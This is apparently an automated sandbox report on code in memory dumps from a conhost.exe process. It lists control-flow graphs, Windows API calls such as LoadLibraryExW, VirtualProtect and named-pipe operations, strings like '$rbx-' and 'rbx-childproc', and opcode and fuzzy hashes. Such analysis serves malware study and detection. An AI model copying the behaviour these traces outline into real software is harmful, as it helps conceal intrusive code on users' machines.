                              control_flow_graph 313 26504eaa22c-26504eaa294 call 26504eab144 316 26504eaa6f5-26504eaa6fb call 26504eac388 313->316 317 26504eaa29a-26504eaa29d 313->317 317->316 318 26504eaa2a3-26504eaa2a9 317->318 320 26504eaa2af-26504eaa2b3 318->320 321 26504eaa378-26504eaa38a 318->321 320->321 325 26504eaa2b9-26504eaa2c4 320->325 323 26504eaa390-26504eaa394 321->323 324 26504eaa645-26504eaa649 321->324 323->324 326 26504eaa39a-26504eaa3a5 323->326 328 26504eaa682-26504eaa68c call 26504ea9324 324->328 329 26504eaa64b-26504eaa652 324->329 325->321 327 26504eaa2ca-26504eaa2cf 325->327 326->324 331 26504eaa3ab-26504eaa3af 326->331 327->321 332 26504eaa2d5-26504eaa2df call 26504ea9324 327->332 328->316 339 26504eaa68e-26504eaa6ad call 26504ea8070 328->339 329->316 333 26504eaa658-26504eaa67d call 26504eaa6fc 329->333 335 26504eaa575-26504eaa581 331->335 336 26504eaa3b5-26504eaa3f0 call 26504ea9704 331->336 332->339 347 26504eaa2e5-26504eaa310 call 26504ea9324 * 2 call 26504ea9a0c 332->347 333->328 335->328 340 26504eaa587-26504eaa58b 335->340 336->335 351 26504eaa3f6-26504eaa3ff 336->351 344 26504eaa58d-26504eaa599 call 26504ea99cc 340->344 345 26504eaa59b-26504eaa5a3 340->345 344->345 357 26504eaa5bc-26504eaa5c4 344->357 345->328 350 26504eaa5a9-26504eaa5b6 call 26504ea95a4 345->350 380 26504eaa330-26504eaa33a call 26504ea9324 347->380 381 26504eaa312-26504eaa316 347->381 350->328 350->357 355 26504eaa403-26504eaa435 351->355 359 26504eaa568-26504eaa56f 355->359 360 26504eaa43b-26504eaa447 355->360 362 26504eaa6d8-26504eaa6f4 call 26504ea9324 * 2 call 26504eac2f4 357->362 363 26504eaa5ca-26504eaa5ce 357->363 359->335 359->355 360->359 364 26504eaa44d-26504eaa46c 360->364 362->316 368 26504eaa5d0-26504eaa5df call 26504ea99cc 363->368 369 26504eaa5e1 363->369 370 26504eaa472-26504eaa4af call 26504ea99e0 * 2 364->370 371 26504eaa558-26504eaa55d 364->371 376 26504eaa5e3-26504eaa5ed call 26504eab1dc 368->376 369->376 393 26504eaa4e2-26504eaa4e5 370->393 371->359 376->328 391 26504eaa5f3-26504eaa643 call 26504ea9634 call 26504ea9838 376->391 380->321 396 26504eaa33c-26504eaa35c call 26504ea9324 * 2 call 26504eab1dc 380->396 381->380 385 26504eaa318-26504eaa323 381->385 385->380 390 26504eaa325-26504eaa32a 385->390 390->316 390->380 391->328 399 26504eaa4b1-26504eaa4d7 call 26504ea99e0 call 26504eaa96c 393->399 400 26504eaa4e7-26504eaa4ee 393->400 418 26504eaa35e-26504eaa368 call 26504eab2cc 396->418 419 26504eaa373 396->419 414 26504eaa4f9-26504eaa556 call 26504eaa158 399->414 415 26504eaa4d9-26504eaa4dc 399->415 404 26504eaa55f 400->404 405 26504eaa4f0-26504eaa4f4 400->405 406 26504eaa564 404->406 405->370 406->359 414->406 415->393 423 26504eaa36e-26504eaa6d1 call 26504ea8f84 call 26504eaad28 call 26504ea9178 418->423 424 26504eaa6d2-26504eaa6d7 call 26504eac2f4 418->424 419->321 423->424 424->362
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000025.00000002.2728044722.0000026504EA1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000026504EA0000, based on PE: true
                              • Associated: 00000025.00000002.2727985736.0000026504EA0000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000025.00000002.2728106310.0000026504EB5000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000025.00000002.2728166738.0000026504EC0000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000025.00000002.2728224819.0000026504EC2000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000025.00000002.2728282868.0000026504EC9000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_37_2_26504ea0000_conhost.jbxd
                              Similarity
                              • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                              • String ID: csm$csm$csm
                              • API String ID: 849930591-393685449
                              • Opcode ID: 037bd7d014dbf073bd717ac1516acd742bbf86a7991252edd6e45b1783c3a634
                              • Instruction ID: f754cd92e2b8a869d11258ae4f09425d123b0552bd0093c4dce3dd0db0e896a8
                              • Opcode Fuzzy Hash: 037bd7d014dbf073bd717ac1516acd742bbf86a7991252edd6e45b1783c3a634
                              • Instruction Fuzzy Hash: B2D1D372604FA2CAEB20DF65D4483AD37A0F79D788F140525EE8957B96CF35E4A4CB02

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 434 26504ea104c-26504ea10b9 RegQueryInfoKeyW 435 26504ea10bf-26504ea10c9 434->435 436 26504ea11b5-26504ea11d0 434->436 435->436 437 26504ea10cf-26504ea111f RegEnumValueW 435->437 438 26504ea11a5-26504ea11af 437->438 439 26504ea1125-26504ea112a 437->439 438->436 438->437 439->438 440 26504ea112c-26504ea1135 439->440 441 26504ea1147-26504ea114c 440->441 442 26504ea1137 440->442 444 26504ea114e-26504ea1193 GetProcessHeap HeapAlloc GetProcessHeap HeapFree 441->444 445 26504ea1199-26504ea11a3 441->445 443 26504ea113b-26504ea113f 442->443 443->438 446 26504ea1141-26504ea1145 443->446 444->445 445->438 446->441 446->443
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000025.00000002.2728044722.0000026504EA1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000026504EA0000, based on PE: true
                              • Associated: 00000025.00000002.2727985736.0000026504EA0000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000025.00000002.2728106310.0000026504EB5000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000025.00000002.2728166738.0000026504EC0000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000025.00000002.2728224819.0000026504EC2000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000025.00000002.2728282868.0000026504EC9000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_37_2_26504ea0000_conhost.jbxd
                              Similarity
                              • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                              • String ID: d
                              • API String ID: 3743429067-2564639436
                              • Opcode ID: 214df63eb12f5006524d9de65027155270ac54fbc8f89443ffbfb24959d92ecf
                              • Instruction ID: 2b9334750b88fd1a2d9f5598a10256c2816d7cec60fb40f5525cc47196f0a263
                              • Opcode Fuzzy Hash: 214df63eb12f5006524d9de65027155270ac54fbc8f89443ffbfb24959d92ecf
                              • Instruction Fuzzy Hash: 2F417073214F95DAE760CF21E44839EB7A1F388B9CF448229DA8907758DF39D459CB41

                              Control-flow Graph

                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000025.00000002.2728044722.0000026504EA1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000026504EA0000, based on PE: true
                              • Associated: 00000025.00000002.2727985736.0000026504EA0000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000025.00000002.2728106310.0000026504EB5000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000025.00000002.2728166738.0000026504EC0000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000025.00000002.2728224819.0000026504EC2000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000025.00000002.2728282868.0000026504EC9000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_37_2_26504ea0000_conhost.jbxd
                              Similarity
                              • API ID: File$Process$CloseCreateCurrentHandleReadThreadWrite
                              • String ID: \\.\pipe\$rbx-childproc
                              • API String ID: 166002920-1828357524
                              • Opcode ID: 2f0528e3c87d94e1cfa1c202f0bfd1f6cfafc65532576ba32c2772f85af7f427
                              • Instruction ID: 0f1d856c1ac42f33e9e1fd6cc5512d6db6fc7ffd67ec0a265cf2603c61a9615a
                              • Opcode Fuzzy Hash: 2f0528e3c87d94e1cfa1c202f0bfd1f6cfafc65532576ba32c2772f85af7f427
                              • Instruction Fuzzy Hash: 4B113732618F51D2E710CF21F45835A7760F389B98F940215EA9902BA8DF3EC149CB82
                              APIs
                              Memory Dump Source
                              • Source File: 00000025.00000003.2595945338.0000026504E70000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000026504E70000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_37_3_26504e70000_conhost.jbxd
                              Similarity
                              • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                              • String ID:
                              • API String ID: 190073905-0
                              • Opcode ID: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                              • Instruction ID: 8327473b320bef1b67460e22e3611c8473c1a9285d79da5433940e764a47adc7
                              • Opcode Fuzzy Hash: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                              • Instruction Fuzzy Hash: 6281C530700E73C6FB54EB659A4936B22D1AB8E7A0F1541299E48477D6EB3BE846C703

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 452 26504ea7c50-26504ea7c56 453 26504ea7c91-26504ea7c9b 452->453 454 26504ea7c58-26504ea7c5b 452->454 455 26504ea7db8-26504ea7dcd 453->455 456 26504ea7c5d-26504ea7c60 454->456 457 26504ea7c85-26504ea7cc4 call 26504ea82f0 454->457 461 26504ea7dcf 455->461 462 26504ea7ddc-26504ea7df6 call 26504ea8184 455->462 459 26504ea7c62-26504ea7c65 456->459 460 26504ea7c78 __scrt_dllmain_crt_thread_attach 456->460 475 26504ea7d92 457->475 476 26504ea7cca-26504ea7cdf call 26504ea8184 457->476 467 26504ea7c71-26504ea7c76 call 26504ea8234 459->467 468 26504ea7c67-26504ea7c70 459->468 465 26504ea7c7d-26504ea7c84 460->465 463 26504ea7dd1-26504ea7ddb 461->463 473 26504ea7df8-26504ea7e29 call 26504ea82ac call 26504ea814c call 26504ea8634 call 26504ea8450 call 26504ea8474 call 26504ea82dc 462->473 474 26504ea7e2b-26504ea7e5c call 26504ea84b0 462->474 467->465 473->463 484 26504ea7e6d-26504ea7e73 474->484 485 26504ea7e5e-26504ea7e64 474->485 479 26504ea7d94-26504ea7da9 475->479 487 26504ea7ce5-26504ea7cf6 call 26504ea81f4 476->487 488 26504ea7daa-26504ea7db7 call 26504ea84b0 476->488 490 26504ea7eb5-26504ea7ecb call 26504ea3a1c 484->490 491 26504ea7e75-26504ea7e7f 484->491 485->484 489 26504ea7e66-26504ea7e68 485->489 502 26504ea7d47-26504ea7d51 call 26504ea8450 487->502 503 26504ea7cf8-26504ea7d1c call 26504ea85f8 call 26504ea813c call 26504ea8168 call 26504eab428 487->503 488->455 496 26504ea7f52-26504ea7f5f 489->496 508 26504ea7ecd-26504ea7ecf 490->508 509 26504ea7f03-26504ea7f05 490->509 497 26504ea7e81-26504ea7e84 491->497 498 26504ea7e86-26504ea7e8c 491->498 505 26504ea7e8e-26504ea7e94 497->505 498->505 502->475 523 26504ea7d53-26504ea7d5f call 26504ea84a0 502->523 503->502 554 26504ea7d1e-26504ea7d25 __scrt_dllmain_after_initialize_c 503->554 512 26504ea7f48-26504ea7f50 505->512 513 26504ea7e9a-26504ea7eaf call 26504ea7c50 505->513 508->509 516 26504ea7ed1-26504ea7ef3 call 26504ea3a1c call 26504ea7db8 508->516 518 26504ea7f07-26504ea7f0a 509->518 519 26504ea7f0c-26504ea7f21 call 26504ea7c50 509->519 512->496 513->490 513->512 516->509 549 26504ea7ef5-26504ea7efa 516->549 518->512 518->519 519->512 534 26504ea7f23-26504ea7f2d 519->534 542 26504ea7d61-26504ea7d6b call 26504ea83b8 523->542 543 26504ea7d85-26504ea7d90 523->543 540 26504ea7f2f-26504ea7f32 534->540 541 26504ea7f34-26504ea7f42 534->541 546 26504ea7f44 540->546 541->546 542->543 553 26504ea7d6d-26504ea7d7b 542->553 543->479 546->512 549->509 553->543 554->502 555 26504ea7d27-26504ea7d44 call 26504eab3f0 554->555 555->502
                              APIs
                              Memory Dump Source
                              • Source File: 00000025.00000002.2728044722.0000026504EA1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000026504EA0000, based on PE: true
                              • Associated: 00000025.00000002.2727985736.0000026504EA0000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000025.00000002.2728106310.0000026504EB5000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000025.00000002.2728166738.0000026504EC0000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000025.00000002.2728224819.0000026504EC2000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000025.00000002.2728282868.0000026504EC9000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_37_2_26504ea0000_conhost.jbxd
                              Similarity
                              • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                              • String ID:
                              • API String ID: 190073905-0
                              • Opcode ID: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                              • Instruction ID: 09756a7049fddb3f02e2534623170ce81d51eff92d7d0199020d1d80e156250a
                              • Opcode Fuzzy Hash: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                              • Instruction Fuzzy Hash: C6810730700F73C6FB54EB65944D3A967E0BB8E784F5481259A4847397DB3BE9668303

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 558 26504ea9aac-26504ea9aea 559 26504ea9af0-26504ea9af3 558->559 560 26504ea9b9e 558->560 561 26504ea9ba0-26504ea9bbc 559->561 562 26504ea9af9-26504ea9afc 559->562 560->561 563 26504ea9b02-26504ea9b11 562->563 564 26504ea9b96 562->564 565 26504ea9b1e-26504ea9b3d LoadLibraryExW 563->565 566 26504ea9b13-26504ea9b16 563->566 564->560 569 26504ea9b3f-26504ea9b48 GetLastError 565->569 570 26504ea9bbd-26504ea9bd2 565->570 567 26504ea9bdd-26504ea9bec GetProcAddress 566->567 568 26504ea9b1c 566->568 567->564 572 26504ea9bee-26504ea9bf9 567->572 573 26504ea9b89-26504ea9b90 568->573 574 26504ea9b77-26504ea9b81 569->574 575 26504ea9b4a-26504ea9b5f call 26504eac4d8 569->575 570->567 571 26504ea9bd4-26504ea9bd7 FreeLibrary 570->571 571->567 572->561 573->563 573->564 574->573 575->574 578 26504ea9b61-26504ea9b75 LoadLibraryExW 575->578 578->570 578->574
                              APIs
                              • LoadLibraryExW.KERNEL32(?,?,?,0000026504EA9C6B,?,?,?,0000026504EA945C,?,?,?,?,0000026504EA8F65), ref: 0000026504EA9B31
                              • GetLastError.KERNEL32(?,?,?,0000026504EA9C6B,?,?,?,0000026504EA945C,?,?,?,?,0000026504EA8F65), ref: 0000026504EA9B3F
                              • LoadLibraryExW.KERNEL32(?,?,?,0000026504EA9C6B,?,?,?,0000026504EA945C,?,?,?,?,0000026504EA8F65), ref: 0000026504EA9B69
                              • FreeLibrary.KERNEL32(?,?,?,0000026504EA9C6B,?,?,?,0000026504EA945C,?,?,?,?,0000026504EA8F65), ref: 0000026504EA9BD7
                              • GetProcAddress.KERNEL32(?,?,?,0000026504EA9C6B,?,?,?,0000026504EA945C,?,?,?,?,0000026504EA8F65), ref: 0000026504EA9BE3
                              Strings
                              Memory Dump Source
                              • Source File: 00000025.00000002.2728044722.0000026504EA1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000026504EA0000, based on PE: true
                              • Associated: 00000025.00000002.2727985736.0000026504EA0000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000025.00000002.2728106310.0000026504EB5000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000025.00000002.2728166738.0000026504EC0000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000025.00000002.2728224819.0000026504EC2000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000025.00000002.2728282868.0000026504EC9000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_37_2_26504ea0000_conhost.jbxd
                              Similarity
                              • API ID: Library$Load$AddressErrorFreeLastProc
                              • String ID: api-ms-
                              • API String ID: 2559590344-2084034818
                              • Opcode ID: 71d948750e90526cf3ff779f44d5551170106daf63fa61af0dbf03442d3e65c3
                              • Instruction ID: 82a76a632d64eac1c440c445a8f0f6f00ae8c437e62dac08ec36b8af10f282e3
                              • Opcode Fuzzy Hash: 71d948750e90526cf3ff779f44d5551170106daf63fa61af0dbf03442d3e65c3
                              • Instruction Fuzzy Hash: 1F31C371312E62D1EF12DB0698087A523D4BB4CBA4F590A25DD1D4B791DF3AE468C346
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000025.00000002.2728044722.0000026504EA1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000026504EA0000, based on PE: true
                              • Associated: 00000025.00000002.2727985736.0000026504EA0000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000025.00000002.2728106310.0000026504EB5000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000025.00000002.2728166738.0000026504EC0000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000025.00000002.2728224819.0000026504EC2000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000025.00000002.2728282868.0000026504EC9000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_37_2_26504ea0000_conhost.jbxd
                              Similarity
                              • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                              • String ID: CONOUT$
                              • API String ID: 3230265001-3130406586
                              • Opcode ID: 42a144b3d0c2ce880bdd00bf22acff5208f3dd7a422955a941dc6bc7111c5e61
                              • Instruction ID: c5d660311908992be06d6801525e124f5fd11bbf80be9e7abf098d7d4623eacd
                              • Opcode Fuzzy Hash: 42a144b3d0c2ce880bdd00bf22acff5208f3dd7a422955a941dc6bc7111c5e61
                              • Instruction Fuzzy Hash: DE116D31310F61C6E751CB96E85871A66A4F78CBE8F444224EE5E87B94CF7AC8088781
                              APIs
                              Memory Dump Source
                              • Source File: 00000025.00000002.2728044722.0000026504EA1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000026504EA0000, based on PE: true
                              • Associated: 00000025.00000002.2727985736.0000026504EA0000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000025.00000002.2728106310.0000026504EB5000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000025.00000002.2728166738.0000026504EC0000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000025.00000002.2728224819.0000026504EC2000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000025.00000002.2728282868.0000026504EC9000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_37_2_26504ea0000_conhost.jbxd
                              Similarity
                              • API ID: Thread$Current$Context
                              • String ID:
                              • API String ID: 1666949209-0
                              • Opcode ID: b08b5ce39edb43236479958ddd03c6d1f6838080b2cf9501a19bb2138673ce94
                              • Instruction ID: 8c888550130b00d47dd261bdf4c5b903dc50ddf8a3177d7dd3d1a0fc6817e242
                              • Opcode Fuzzy Hash: b08b5ce39edb43236479958ddd03c6d1f6838080b2cf9501a19bb2138673ce94
                              • Instruction Fuzzy Hash: 15D1B776208F99C2DA70DB1AE49835AB7A0F3CDB88F140616EACD477A9CF39D551CB01
                              APIs
                              Memory Dump Source
                              • Source File: 00000025.00000002.2728044722.0000026504EA1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000026504EA0000, based on PE: true
                              • Associated: 00000025.00000002.2727985736.0000026504EA0000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000025.00000002.2728106310.0000026504EB5000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000025.00000002.2728166738.0000026504EC0000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000025.00000002.2728224819.0000026504EC2000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000025.00000002.2728282868.0000026504EC9000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_37_2_26504ea0000_conhost.jbxd
                              Similarity
                              • API ID: Free$CurrentThread
                              • String ID:
                              • API String ID: 564911740-0
                              • Opcode ID: d3c28f796396b1edcf9deeb44a5a84d122c2fcfc0f762368ef43e6e6c9edfbab
                              • Instruction ID: 16cbdc8838f62f6ad5a2d1b0cb3a8c032031ac4f4b58e0534df5b7acec241159
                              • Opcode Fuzzy Hash: d3c28f796396b1edcf9deeb44a5a84d122c2fcfc0f762368ef43e6e6c9edfbab
                              • Instruction Fuzzy Hash: F551F930201F67D5EF09DF24E89869833A1FB0C748F844955AA2D077A6EF7AE539C742
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000025.00000002.2728044722.0000026504EA1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000026504EA0000, based on PE: true
                              • Associated: 00000025.00000002.2727985736.0000026504EA0000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000025.00000002.2728106310.0000026504EB5000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000025.00000002.2728166738.0000026504EC0000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000025.00000002.2728224819.0000026504EC2000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000025.00000002.2728282868.0000026504EC9000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_37_2_26504ea0000_conhost.jbxd
                              Similarity
                              • API ID: Heap$Process$AllocFree
                              • String ID: $rbx-
                              • API String ID: 756756679-3661604363
                              • Opcode ID: cf694f0bea780c6e1211edc3f081aa45b4316966585fdcbda0fb213a5a03d4f8
                              • Instruction ID: 76a6ae1a01e32d411396f6e1adf6a4fcac8744be072a43a0876b9ee392b66efb
                              • Opcode Fuzzy Hash: cf694f0bea780c6e1211edc3f081aa45b4316966585fdcbda0fb213a5a03d4f8
                              • Instruction Fuzzy Hash: 63319032701F62D3EB55DF16E94876AA7A0FB88B84F0C48209F4907B55EF3AE4758741
                              APIs
                              Memory Dump Source
                              • Source File: 00000025.00000002.2728044722.0000026504EA1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000026504EA0000, based on PE: true
                              • Associated: 00000025.00000002.2727985736.0000026504EA0000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000025.00000002.2728106310.0000026504EB5000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000025.00000002.2728166738.0000026504EC0000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000025.00000002.2728224819.0000026504EC2000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000025.00000002.2728282868.0000026504EC9000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_37_2_26504ea0000_conhost.jbxd
                              Similarity
                              • API ID: ErrorLast$Value$FreeHeap
                              • String ID:
                              • API String ID: 365477584-0
                              • Opcode ID: 2b4934949d3deca667ae4771e81ed1922e44bbeb7fb5f4fb09c3a9f1576f5646
                              • Instruction ID: 6e8a026b5cf63212b5ffff7024d8d325971e55c5b43bda475cc4df67c0d44ffa
                              • Opcode Fuzzy Hash: 2b4934949d3deca667ae4771e81ed1922e44bbeb7fb5f4fb09c3a9f1576f5646
                              • Instruction Fuzzy Hash: C611A931300F73C2FA54EB71781D3EE1252AB8D798F654624E866577D6DE3AE8218313
                              APIs
                              Memory Dump Source
                              • Source File: 00000025.00000002.2728044722.0000026504EA1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000026504EA0000, based on PE: true
                              • Associated: 00000025.00000002.2727985736.0000026504EA0000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000025.00000002.2728106310.0000026504EB5000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000025.00000002.2728166738.0000026504EC0000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000025.00000002.2728224819.0000026504EC2000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000025.00000002.2728282868.0000026504EC9000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_37_2_26504ea0000_conhost.jbxd
                              Similarity
                              • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                              • String ID:
                              • API String ID: 517849248-0
                              • Opcode ID: 3678c02db6aac465212181e8004412cbf2c2ed21259821feedd311f468bba618
                              • Instruction ID: 761087416abc80b15684c0f9cc0b178824dec605f95b8abd615ab026bd770e38
                              • Opcode Fuzzy Hash: 3678c02db6aac465212181e8004412cbf2c2ed21259821feedd311f468bba618
                              • Instruction Fuzzy Hash: 28011731704F52D6EA54DB12A85835AA3A1FB8CFC4F884135DE9D43754DE3AC98AC781
                              APIs
                              Memory Dump Source
                              • Source File: 00000025.00000002.2728044722.0000026504EA1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000026504EA0000, based on PE: true
                              • Associated: 00000025.00000002.2727985736.0000026504EA0000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000025.00000002.2728106310.0000026504EB5000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000025.00000002.2728166738.0000026504EC0000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000025.00000002.2728224819.0000026504EC2000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000025.00000002.2728282868.0000026504EC9000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_37_2_26504ea0000_conhost.jbxd
                              Similarity
                              • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                              • String ID:
                              • API String ID: 449555515-0
                              • Opcode ID: cded63a883f53769b64ee8603978d746ac0fde6b870154241cf5f6bb9e490f61
                              • Instruction ID: f8c2d19afdb82e746293e52d993757baa6165dfebb384c54689a4b9fc74cd54b
                              • Opcode Fuzzy Hash: cded63a883f53769b64ee8603978d746ac0fde6b870154241cf5f6bb9e490f61
                              • Instruction Fuzzy Hash: 39011775615F62C2EB64DF25E84C71A62A0AB4CB89F044028DE4D063A5EF3EC4588742
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000025.00000002.2728044722.0000026504EA1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000026504EA0000, based on PE: true
                              • Associated: 00000025.00000002.2727985736.0000026504EA0000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000025.00000002.2728106310.0000026504EB5000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000025.00000002.2728166738.0000026504EC0000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000025.00000002.2728224819.0000026504EC2000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000025.00000002.2728282868.0000026504EC9000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_37_2_26504ea0000_conhost.jbxd
                              Similarity
                              • API ID: FinalHandleNamePathlstrlen
                              • String ID: \\?\
                              • API String ID: 2719912262-4282027825
                              • Opcode ID: effff3530f1f25e22f57eaf43e9f5b9d86630ec4a353fbe38ed28e1154ec946c
                              • Instruction ID: c90dd2b691fd84445c3d88584826e080a68923eb08f8bca6788a8dfac5923b53
                              • Opcode Fuzzy Hash: effff3530f1f25e22f57eaf43e9f5b9d86630ec4a353fbe38ed28e1154ec946c
                              • Instruction Fuzzy Hash: 13F04472304E96D2E760CB21F59835AA361F748B8CFC84025DA4946A58DE7DC65DCB41
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000025.00000002.2728044722.0000026504EA1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000026504EA0000, based on PE: true
                              • Associated: 00000025.00000002.2727985736.0000026504EA0000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000025.00000002.2728106310.0000026504EB5000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000025.00000002.2728166738.0000026504EC0000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000025.00000002.2728224819.0000026504EC2000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000025.00000002.2728282868.0000026504EC9000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_37_2_26504ea0000_conhost.jbxd
                              Similarity
                              • API ID: CombinePath
                              • String ID: \\.\pipe\
                              • API String ID: 3422762182-91387939
                              • Opcode ID: e16f4b25d0074ed40968d37b24dcd1bf4c0770f318e82e0156fcd8cc7ff66dcb
                              • Instruction ID: 614f99f01eb7246725fd745a81af8eaa4ee6d4020236e6874dce499aa5166828
                              • Opcode Fuzzy Hash: e16f4b25d0074ed40968d37b24dcd1bf4c0770f318e82e0156fcd8cc7ff66dcb
